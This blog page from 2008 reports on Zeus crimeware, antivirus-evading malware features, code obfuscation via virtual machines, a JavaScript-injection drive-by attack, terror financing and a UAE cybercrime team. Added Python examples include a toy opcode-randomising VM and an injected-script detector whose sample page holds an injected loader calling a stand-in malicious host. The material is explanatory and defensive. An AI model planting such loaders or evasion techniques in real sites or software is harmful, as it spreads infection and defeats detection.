Credit card fraud might have played role in financing Mumbai terror attacks, expert suggests

•December 4, 2008 • 1 Comment

Indian authorities have recovered $1,200 and several credit cards from a backpack carried by one of the terrorists who assailed ten targets in Mumbai, killing at least 172 people and injuring hundreds of others, according to press reports. The presence of the cards might signal that credit card fraud helped fund the terror attacks, Dennis Lormel, an anti-money laundering consultant who once led the Federal Bureau of Investigation’s anti-terrorist financing unit, told Complinet.

The credit cards in question reportedly were issued by Citibank, HSBC, ICICI Bank, Axis Bank, HDFC Bank and State Bank of Mauritius. “I’m interested in the potential credit card fraud as a funding source and operational support mechanism,” Lormel said. For Lormel, the possible link between credit card fraud and the Mumbai terrorist attacks is more than a fleeting interest. He has long feared that terrorists are becoming increasingly adept at generating funds through such illicit schemes; he recently wrote a white paper in which he dubbed credit card fraud a “growth industry” for terrorists. “There is no empirical statistical data establishing the nexus between credit card exploitation and terrorism, but there are ample anecdotal case studies demonstrating how extensively terrorists rely on credit card information in furtherance of their heinous activities,” Lormel wrote in his paper.

Alternative funding sources

Lormel added that a previous Complinet article examining how the Mumbai attacks might have been funded “presents interesting and viable possible funding sources.”

“It’s highly likely hawalas were used. Wealthy individual donors and charities could be funding sources, as pointed out. It will be interesting to determine if drugs and other criminal activities contributed. Likewise, the nexus between Dawood Ibrahim and the attack should be one of the highest investigative priorities,” he said.

“The attack itself will play out to be inexpensive. The overall operation will be much costlier when you factor in the training and subsistence of the attackers and their logistical support element.”

Still, Lormel conceded that it may be some time before authorities can say with any degree of certainty how the murderous rampage was funded. “It’s too early to understand the scope of the funding for the attacks,” he said.


Nobel Laureate is the father of Kevin Mitnick investigator | Zero Day | ZDNet.com

•October 17, 2008 • Leave a Comment


Crimeware gets easy and progressively harder to fight

•October 17, 2008 • Leave a Comment

The Zeus Trojan kit is nothing new. It has been available on the market for around $700 and, as reported by stopBADware, the online malware resource, has been used in more than 150 attacks, each infecting around 4,000 computers per day.
Some additional background:

1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for roughly $700. In the past 6 months RSA’s Anti-Fraud Command Center has detected more than 150 different uses of the Zeus kit, each one infecting on average roughly 4,000 different computers a day.

2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new binary file, and these files are radically different from each other — making them notoriously difficult for anti-virus or security software to detect. To date very few variants have had effective anti-virus signatures against them and each use of the kit usually makes existing signatures ineffective. Just like in most cases, this particular use of the Zeus kit did not have any anti-virus detection (with the popular engines we tested) at the time of this writing.

3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening in on the submission of forms in the browser, the Trojan has advanced capabilities such as taking screenshots of a victim’s machine, controlling it remotely, adding extra pages to a website and monitoring it, and stealing passwords that have been stored by popular programs (remember when you clicked on the “Remember this password?” checkbox?). And the feature list goes on.

In an additional twist, the Russian Business Network, which has been associated with the creation and distribution of the Zeus kit, is actively working to protect its intellectual property from security companies and their customers. RBN has threatened to sue security companies for blacklisting its products.

As this trend goes even more mainstream, we are seeing the common Web 2.0 mentality, that the more people use a service the better it gets, applied to malware: open source malware and malware as a web service. Once the source code becomes publicly obtainable, it is not just new features and modules that get introduced; the malware also starts using the Web as a platform.

Some of the most popular open source badware code kits are successfully building communities around their open source nature, attracting criminal innovation from third-party coders.

And so we are beginning to see a demand for “quality of service”, which has led to commercial code obfuscation software such as Code Virtualizer. “Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Opcodes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and the Virtual Machine itself are unique for every protected application, avoiding a general attack over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and x64 native PE files (like executable files/EXEs, system services, DLLs, OCXs, ActiveX controls, screen savers and device drivers).

Modified Code
Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into a different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions. The following picture represents how a block of Intel x86 instructions is converted into different kinds of virtual opcodes, which could be emulated by different virtual machines.

When an attacker tries to decompile a block of code that was protected by Code Virtualizer, he will not find the original x86 instructions. Instead, he will find a completely new instruction set which is not recognized by him or any other special decompiler. This will force the attacker to go through the extremely hard work of identifying how each opcode is executed and how the specific virtual machine works for each protected application. Code Virtualizer totally obfuscates the execution of the virtual opcodes and the study of each unique virtual machine in order to prevent someone from studying how the virtual opcodes are executed.”
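As an added illustration, not code from the post or from Code Virtualizer (whose instruction set is proprietary), this hypothetical five-instruction stack VM shows the property the quoted text describes: the same logic lowered under two different per-build opcode tables runs identically, yet a byte signature taken from one build finds nothing in the other, so an analyst has to recover each build's opcode table before reading its code. The mnemonics, opcode tables and sample program are constructed for this example; in miniature it is also why per-build output defeats existing signatures, the problem point 2 above notes for the Zeus kit.

```python
import random

# Hypothetical five-instruction stack VM; not Code Virtualizer's real instruction set.
MNEMONICS = ("PUSH", "ADD", "MUL", "XOR", "RET")

def make_opcode_table(seed):
    """One random opcode byte per mnemonic; each seed models one protected build."""
    rng = random.Random(seed)
    return dict(zip(MNEMONICS, rng.sample(range(256), len(MNEMONICS))))

def assemble(program, table):
    """Lower the original logic to bytecode that only this build's VM can decode."""
    code = bytearray()
    for mnem, *operands in program:
        code.append(table[mnem])
        code.extend(op & 0xFF for op in operands)
    return bytes(code)

def run_vm(code, table):
    """Interpret bytecode with the build's own opcode table (8-bit arithmetic)."""
    decode = {opcode: mnem for mnem, opcode in table.items()}
    stack, pc = [], 0
    while pc < len(code):
        mnem = decode[code[pc]]   # KeyError if fed another build's table
        pc += 1
        if mnem == "PUSH":
            stack.append(code[pc])
            pc += 1
        elif mnem == "RET":
            return stack.pop()
        else:
            b, a = stack.pop(), stack.pop()
            stack.append({"ADD": a + b, "MUL": a * b, "XOR": a ^ b}[mnem] & 0xFF)
    raise ValueError("bytecode ended without RET")

def compare_builds(program, table_a, table_b):
    """What an analyst sees across two builds: same behaviour, no shared byte pattern."""
    code_a, code_b = assemble(program, table_a), assemble(program, table_b)
    signature = code_a[:3]  # a static signature written against build A's bytes
    return {
        "result_a": run_vm(code_a, table_a),
        "result_b": run_vm(code_b, table_b),
        "same_bytecode": code_a == code_b,
        "signature_hits_a": signature in code_a,
        "signature_hits_b": signature in code_b,
    }

# The logic being protected, written once: (6 * 7) + 1 = 43.
PROGRAM = [("PUSH", 6), ("PUSH", 7), ("MUL",), ("PUSH", 1), ("ADD",), ("RET",)]

if __name__ == "__main__":
    print(compare_builds(PROGRAM, make_opcode_table(1), make_opcode_table(2)))
```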


Web Based Malware Gets Smart(er) and Nasty

•October 7, 2008 • Leave a Comment

In the ongoing development of web based malware, we see an escalation of features along with the commoditization of anti-debugging features within modern malware. “Plain” simple feature sets, which in February of this year started to include what the malware creators describe as managed binary crypting and on-demand firewall bypassing verification, had by August matured into an overall anti-antivirus-software mentality as a key differentiating factor of malware.

So what new features are they working on? Anti-tracing and emulation protection, PEiD and PESniffer protection, as well as anti-heuristic scanning.


Here’s a translated description (courtesy of the fine minds at Kaspersky):

“– The binary works under admin and under normal user
– The binary is always run as the “current user”
– An unlimited number of bots can be loaded and integrated within the command and control, and with the geolocation feature, filters can be applied for a particular country
– After successful infection, the binary, which is tested against popular firewall and proactive protection security, ensures that the actions it takes and their order do not trigger proactive protection mechanisms in place
– Binary file size is 25k; the size can be reduced once it’s crypted


– Doesn’t take advantage of BITS protocol
– Doesn’t allow an infected host to be infected twice
– Bypassing NAT and supporting “always-on” connections
– A simple, easy to configure web based admin panel”

JavaScript Injection Attack

•September 30, 2008 • Leave a Comment

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply “steal” a website’s visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

[Screenshot: JS Injection]

We’ve seen numerous high traffic, legitimate websites attacked using this technique. One recent example is MegaGames, a very popular U.S. gaming portal with an Alexa rank of 3172. The JavaScript injection attack successfully exploited one of MegaGames’ servers to insert a couple of extra lines of code. This addition redirects unsuspecting website visitors to a malicious European site where the main infection attempts are carried out.

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014).

[Screenshot: JS Attack]

This attack would only affect website visitors using versions of Microsoft’s Internet Explorer (IE) browser, as the website basically requires visitors to use an ActiveX Control, then uses a loophole in the way the ActiveX Control interacts with the IE browser to provide remote attackers complete control over a victim’s system.

The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser’s type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system.

[Screenshot: Flash Exploits]

The MegaGames website is currently still compromised and its misfortune illustrates a good point. Many Internet users are under the impression that they can only get infected with malware if they visit “obviously risky” (dodgy) websites, such as “pr0n” or “warez” sites. Unfortunately, that’s not true. Malware writers have been getting more sophisticated and today, even legitimate news or business sites can get surreptitiously compromised.

Another good example that no site is safe is BusinessWeek.com, a very legitimate and high traffic site. It has fallen victim to an SQL injection attack, and such attacks inject JavaScript…
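The defensive counterpart of the injection described above, as an added example that is my own and not from the post or from MegaGames: it scans served HTML for script tags pointing at hosts outside the site's allowlist and for inline loaders built from unescape/document.write, the shape the injected lines take. The sample page, its hostnames and the allowlist are constructed for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    # Collects (line, src) for external scripts and (line, body) for inline ones.
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._script_line = False, 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        line, src = self.getpos()[0], dict(attrs).get("src")
        if src:
            self.external.append((line, src))
        else:
            self._in_script, self._script_line = True, line

    def handle_data(self, data):
        if self._in_script:
            self.inline.append((self._script_line, data))

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

# Primitives injected loaders lean on: decoding a packed string, then writing a tag.
LOADER_PRIMITIVES = re.compile(r"unescape\(|String\.fromCharCode|document\.write\(|eval\(", re.I)

def find_injected_scripts(html, allowed_hosts):
    # Flag scripts served from hosts outside the allowlist and loader-style inline scripts.
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for line, src in collector.external:
        host = urlparse(src).hostname  # None for site-relative paths such as /js/site.js
        if host and host not in allowed_hosts:
            findings.append((line, "external script from unexpected host: " + host))
    for line, body in collector.inline:
        if LOADER_PRIMITIVES.search(body):
            findings.append((line, "inline script uses loader/obfuscation primitives"))
    return findings

# Constructed sample page: a legitimate site with two injected lines near the bottom.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example-games.test/lib.js"></script>
</head><body><p>Welcome to the portal</p>
<script src="http://bad.example.test/loader.js"></script>
<script>document.write(unescape('%3Ciframe src=%22http://bad.example.test/%22%3E%3C/iframe%3E'))</script>
</body></html>"""

def demo():
    return find_injected_scripts(SAMPLE_HTML, {"cdn.example-games.test"})
```

Run over a site's own HTML on a schedule, the function gives a cheap integrity check that would have surfaced both injected lines before the first visitor was redirected.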

UAE gets new special anti-cybercrime body

•September 30, 2008 • Leave a Comment

Note: I will be visiting Dubai to follow up on a number of cybercrime activities.

Cybersecurity in the United Arab Emirates has just got tighter following the announcement of the creation of the UAE Computer Emergency Response Team. The UAE’s Telecom Regulatory Authority has tasked this new group, which will start operations this year, with fighting cybercrime in the country.

The official unveiling of aeCERT has been made at the inaugural Deep Knowledge Security Conference, attended by regional and international cybersecurity experts. Mohammed Nasser Al Ghanim, director of the UAE’s Telecom Regulatory Authority, spoke of the need to create such a unit given the growing problems surrounding cybercrime in the region. “This year, the UAE counteracted many attacks, mainly website defacement, phishing attacks and many others. These attacks caused immense damage to the businesses,” said Al Ghanim.

A quick start to operations has been promised, as aeCERT should come online by the end of 2007. “The team will begin operation by the fourth quarter of this year. It will be comprehensive and help prevent much Internet crime,” said Fatma Bazarghan, who will head the new hi-tech unit. The UAE has lately been the focus of attention regarding cybercrime in the Gulf, as a large cyberfraud gang offering bogus services from the Dubai International Finance Centre was dismantled. Even more recently the authorities thwarted a hacking attempt on the Dubai eGovernment computer network, and the UAE is a regional leader in terms of sheer numbers of cyberattacks. However, much has also been done to safeguard online safety in the country with the adoption of strict anti-cybercrime laws in 2006. The establishment of the new crime-fighting group is another step in the right direction for the UAE.
